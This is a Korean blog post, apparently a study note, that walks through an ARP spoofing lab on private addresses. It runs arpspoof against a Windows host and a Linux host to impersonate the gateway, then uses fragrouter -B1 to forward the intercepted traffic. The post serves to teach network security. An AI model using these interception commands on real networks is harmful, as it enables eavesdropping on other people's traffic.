네트워크 보안 - arpspoof, fragrouter(ARP Spoofing(스푸핑))

안녕하세요~ 지방토끼입니다.

오늘은 네트워크 보안 arpspoof, fragrouter(ARP Spoofing(스푸핑))에 대해서 공부해 보려고 합니다!

그럼 시작해 볼까요?

 

Kali IP : 192.168.15.100

Linux IP : 192.168.15.101

Windows IP : 192.168.15.102

 

ARP Spoofing(스푸핑)

- 로컬 네트워크(LAN)에서 사용하는 ARP 프로토콜의 허점을 이용하여 자신의 MAC 주소를

다른 사용자(Gateway 주소를 변조하는게 좋음)의 MAC 주소인 것 처럼 속이는 공격

- ARP Cache 정보를 임의로 변조한다고 하여 ARP Cache Poisoning 공격 이라고도 함

 

(Spoofing 종류)

- IP Spoofing

- DNS Spoofing

- ARP Spoofing

- Mail Spoofing

 

(방식)

- Dynamic -> ARP 프로토콜의 허점

- Static

 

1. ARP Table 확인(Windows)

> arp -a

 

 

 

2. ARP Spoofing 공격(Kali)

# arpspoof

 

 

# arpspoof -i eth0 -t 192.168.15.102 192.168.15.2 (게이트웨이 MAC 주소 변조)

 

 

 

3. ARP Table 확인(Linux)

# arp -a

 

 

 

4. ARP Spoofing 공격(Kali)

# arpspoof -i eth0 -t 192.168.15.101 192.168.15.2 (게이트웨이 MAC 주소 변조)

 

 

 

5. IP Forwarding(패킷 재전송)(Kali)

# fragrouter

- MAC 주소가 서로 동일 할 경우 충돌이 일어나기 때문에 원활한 데이터 전달을 위해 사용

 

 

 

# fragrouter -B1

 

 

 

 

 

 

 

 

 

.

.

.

.

.

.

 

오늘은 네트워크 보안 arpspoof, fragrouter(ARP Spoofing(스푸핑))에 대해서 공부해 보았습니다.!

읽어주셔서 감사합니다!

나쁜 용도로 쓰시면 안돼요!!

틀린 내용이나 부족한 부분이 있다면 댓글 부탁드려용!